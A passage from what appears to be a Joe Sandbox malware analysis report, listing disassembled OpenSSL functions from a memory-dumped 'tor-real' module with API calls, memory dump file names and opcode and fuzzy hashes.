                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$E_free$E_dupL_sk_findL_sk_pushL_sk_set_cmp_funcM_read_bio_O_freeR_readX509X509_freeX509_get_subject_name__stack_chk_fail
                                                                            • String ID:
                                                                            • API String ID: 2222204369-0
                                                                            • Opcode ID: e196b57b13a76c28dd59f7503b2af24c71797f143e8526b8a662a7bc0547a7c7
                                                                            • Instruction ID: 1a615b736c96f758c0418a961a3271cf20ea7857cb4b92a8164e8738e93ace40
                                                                            • Opcode Fuzzy Hash: e196b57b13a76c28dd59f7503b2af24c71797f143e8526b8a662a7bc0547a7c7
                                                                            • Instruction Fuzzy Hash: 24F0B2B5A487048FC704AFAAC48055EFBF0BB88718F918E1DE4D8A7700D734E9468F46
                                                                            Function 6C0E655C Relevance: 7.5, APIs: 5, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_free$H_freeH_set0_pqgN_get_rfc3526_prime_8192
                                                                            • String ID:
                                                                            • API String ID: 1947367523-0
                                                                            • Opcode ID: 1cda43bcd87b7c046a01fc50346082c9cb59d15289f4a89f37d5f8be13dd8944
                                                                            • Instruction ID: 1fa527e6863209ec71e425a8baa799a40ebd54285c145bc3aa7875019605ed9f
                                                                            • Opcode Fuzzy Hash: 1cda43bcd87b7c046a01fc50346082c9cb59d15289f4a89f37d5f8be13dd8944
                                                                            • Instruction Fuzzy Hash: EFE065B258D7154FD3012F74A88035EFBD0EF8862CF41882DD59897B00D334A4094B86
                                                                            Function 6C0E656C Relevance: 7.5, APIs: 5, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_free$H_freeH_set0_pqgN_get_rfc3526_prime_4096
                                                                            • String ID:
                                                                            • API String ID: 946563573-0
                                                                            • Opcode ID: f761af2d1a518544cd6208dba5d3f2155aa29819a14ff6dc8cc43210f8fdb82e
                                                                            • Instruction ID: b9e13531f4022d12992b60781c785f8b70c0c6fe3f74c940dec882ec13dfeaef
                                                                            • Opcode Fuzzy Hash: f761af2d1a518544cd6208dba5d3f2155aa29819a14ff6dc8cc43210f8fdb82e
                                                                            • Instruction Fuzzy Hash: 73E065B258E7154FD3002F74A88035EF7D0EF8862CF41882DD59987B00D334A4094B86
                                                                            Function 6C0E657C Relevance: 7.5, APIs: 5, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_free$H_freeH_set0_pqgN_get_rfc2409_prime_1024
                                                                            • String ID:
                                                                            • API String ID: 879964548-0
                                                                            • Opcode ID: 1cda43bcd87b7c046a01fc50346082c9cb59d15289f4a89f37d5f8be13dd8944
                                                                            • Instruction ID: 00516394322b9c9b4b63ed47e12a79aa26afdfcd3140ab2462d770161b78b9cf
                                                                            • Opcode Fuzzy Hash: 1cda43bcd87b7c046a01fc50346082c9cb59d15289f4a89f37d5f8be13dd8944
                                                                            • Instruction Fuzzy Hash: 90E065B258D7154FD3012F74A88036EF7D0EF8862CF41882DD59897B10D334A4094B86
                                                                            Function 6C0DCF1B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 347COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: P
                                                                            • API String ID: 1452528299-3110715001
                                                                            • Opcode ID: 3f73f0c4fa6185d9174f7caa466ff61994f58a460b56b641efc67c1f8528ff6f
                                                                            • Instruction ID: f8ed00bf7b89fd252baf939a83b5c12f4baa8f91c23c1aaee88787ebbf209fbb
                                                                            • Opcode Fuzzy Hash: 3f73f0c4fa6185d9174f7caa466ff61994f58a460b56b641efc67c1f8528ff6f
                                                                            • Instruction Fuzzy Hash: B7E12974609310CFE7519F28C48078ABBE0FF46308F9659A9E8958BB65C779E880CF52
                                                                            Function 6C0C8913 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 236COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zalloc
                                                                            • String ID: D$P
                                                                            • API String ID: 1208671065-307317852
                                                                            • Opcode ID: e842717571bdbf1ee610d2720c4818cb2a93b61562e24bf7a6d14ecdae3b4c31
                                                                            • Instruction ID: 33e721246f80739e54a25f9e897f6843b9e08aed1d1036c9dadb84a24ff14701
                                                                            • Opcode Fuzzy Hash: e842717571bdbf1ee610d2720c4818cb2a93b61562e24bf7a6d14ecdae3b4c31
                                                                            • Instruction Fuzzy Hash: 27A1C2B06097019FE700DF25C98475FBBE0AB84348F50891EE8989B750D774E949DF57
                                                                            Function 6C0C6EE1 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 223COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: P$l
                                                                            • API String ID: 0-638663543
                                                                            • Opcode ID: be239eff0a4d314ba190f41a7435c02edfdd9c200f6acaff3b673aa366853b11
                                                                            • Instruction ID: 5c2b04079c6998fe0649557d5e286eb60a5a7cc28198f289e941e428de7b2076
                                                                            • Opcode Fuzzy Hash: be239eff0a4d314ba190f41a7435c02edfdd9c200f6acaff3b673aa366853b11
                                                                            • Instruction Fuzzy Hash: B9A123B06093118FE310DF29C48476EBBE1BF89748F51892DE8A89B791D774D849CB93
                                                                            Function 6C0DC52B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 199COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BIO_clear_flags.LIBCRYPTO-1_1 ref: 6C0DC6C3
                                                                            • BIO_set_flags.LIBCRYPTO-1_1 ref: 6C0DC6D3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_clear_flagsO_set_flags
                                                                            • String ID: D$P
                                                                            • API String ID: 3946675294-307317852
                                                                            • Opcode ID: 3f7532f34579720093057ee64636ba7fbd0c04ac42324472cfd86c8be5f528c1
                                                                            • Instruction ID: a84568881bbc7e87712d252a9768f8fa694c682a7d9a05d5a398f94aa5a5627c
                                                                            • Opcode Fuzzy Hash: 3f7532f34579720093057ee64636ba7fbd0c04ac42324472cfd86c8be5f528c1
                                                                            • Instruction Fuzzy Hash: CF71B5B0659301CBE720AF29C084749BBE0FB45308F464AA9E4558BB45D7B6F8C4DF82
                                                                            Function 6C0C8E50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D$P$t3
                                                                            • API String ID: 0-293624935
                                                                            • Opcode ID: 6cc16649b001c344856f41986bda6a6890f387b6f9e678e8dde3477c52164028
                                                                            • Instruction ID: 6e9e7ae23ee9f5fead3eb321719066e6ef83b6749dd12dd73d018563a9fdad73
                                                                            • Opcode Fuzzy Hash: 6cc16649b001c344856f41986bda6a6890f387b6f9e678e8dde3477c52164028
                                                                            • Instruction Fuzzy Hash: 9A5146B42093019FE700DF25C48479EBBE4BF88348F148A6EE8A88B745D775E945CB86
                                                                            Function 6C0A0430 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0459
                                                                            • BIO_write.LIBCRYPTO-1_1 ref: 6C0A048D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: DigestO_writeUpdate
                                                                            • String ID: D$P
                                                                            • API String ID: 1267058251-307317852
                                                                            • Opcode ID: edab616805584012dd8763be837ef7b6881041d59c2b3a6c4ee747ef3e278b2f
                                                                            • Instruction ID: c7bfecd1fa40d5bfcf588df0e1f01b0ae9f9fd7eac015fa478f53e8b3ffea544
                                                                            • Opcode Fuzzy Hash: edab616805584012dd8763be837ef7b6881041d59c2b3a6c4ee747ef3e278b2f
                                                                            • Instruction Fuzzy Hash: 772112B050D3419FE700CFA4E58438BBBE0BB84758F10892DE9A88B751D775D889CF82
                                                                            Function 6C0E800B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0E7E43
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0E7E61
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0E7E84
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0E7E94
                                                                            • EVP_PKEY_derive_init.LIBCRYPTO-1_1 ref: 6C0E7EFD
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E7F31
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E7F61
                                                                            • EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0E7FA9
                                                                            • EVP_PKEY_derive_init.LIBCRYPTO-1_1 ref: 6C0E7FF9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: DigestX_ctrlX_freeY_derive_init$Final_exInit_exX_new
                                                                            • String ID: D$P
                                                                            • API String ID: 636564888-307317852
                                                                            • Opcode ID: 27b99ed58f42a9040165e7aecac912637f54717f76f9e0d875d311c01a24b3d6
                                                                            • Instruction ID: cc999e93f4f56f5af47a98812f3ae5995a3ae3e9dda1c83bcb10205cbaf72c87
                                                                            • Opcode Fuzzy Hash: 27b99ed58f42a9040165e7aecac912637f54717f76f9e0d875d311c01a24b3d6
                                                                            • Instruction Fuzzy Hash: C00132B1249301DFE3A0DF69D58074BFBE0EB88318F50992EE19897A00E7349448CB92
                                                                            Function 6C0D8DB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_MD_CTX_copy_ex.LIBCRYPTO-1_1 ref: 6C0D8DD2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_copy_ex
                                                                            • String ID: D$P$z
                                                                            • API String ID: 774438373-1225762907
                                                                            • Opcode ID: 885d3f2fa8406240f6d067b8067227ea08f905833c2397a6c99d67d825924cff
                                                                            • Instruction ID: 46207db3ffca3848c971308e2b260718ab6296bc27d525ec6e7a91e3741d965f
                                                                            • Opcode Fuzzy Hash: 885d3f2fa8406240f6d067b8067227ea08f905833c2397a6c99d67d825924cff
                                                                            • Instruction Fuzzy Hash: CC0113B06093008FE700DF65C48870EBBE0AB84708F60895DE8989B351D77AD558DF93
                                                                            Function 6C0B2B31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0B291A
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0B2B49
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0B2B6A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_priv_bytes
                                                                            • String ID:
                                                                            • API String ID: 1100307897-3916222277
                                                                            • Opcode ID: 32e0eb094ba4d6420386e7b586f170558f3f5eb9493b298191a9225d6ab6b3cc
                                                                            • Instruction ID: c4147c68fe244877bba097bfc26a7275d67d87d652e8f0f3feba36944bc89dcd
                                                                            • Opcode Fuzzy Hash: 32e0eb094ba4d6420386e7b586f170558f3f5eb9493b298191a9225d6ab6b3cc
                                                                            • Instruction Fuzzy Hash: 4511EDB01453018EE700EF24E9CC38A7BE0BF08358F0A457CDD899F646E77690888B51
                                                                            Function 6C092068 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BIO_new.LIBCRYPTO-1_1 ref: 6C09207C
                                                                              • Part of subcall function 6C0B1080: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0B10B4
                                                                              • Part of subcall function 6C0B1080: CRYPTO_THREAD_lock_new.LIBCRYPTO-1_1 ref: 6C0B10D0
                                                                              • Part of subcall function 6C0B1080: OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0B1173
                                                                            • BIO_ctrl.LIBCRYPTO-1_1 ref: 6C0920C0
                                                                              • Part of subcall function 6C0B3DD0: EVP_CIPHER_CTX_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,6C091E0D), ref: 6C0B3E04
                                                                              • Part of subcall function 6C0B3DD0: EVP_CIPHER_CTX_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,6C091E0D), ref: 6C0B3E20
                                                                              • Part of subcall function 6C0B3DD0: COMP_CTX_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,6C091E0D), ref: 6C0B3E38
                                                                              • Part of subcall function 6C0B3DD0: COMP_CTX_free.LIBCRYPTO-1_1 ref: 6C0B3E50
                                                                              • Part of subcall function 6C0B3DD0: EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0B3E68
                                                                              • Part of subcall function 6C0B3DD0: EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0B3E80
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0920E5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
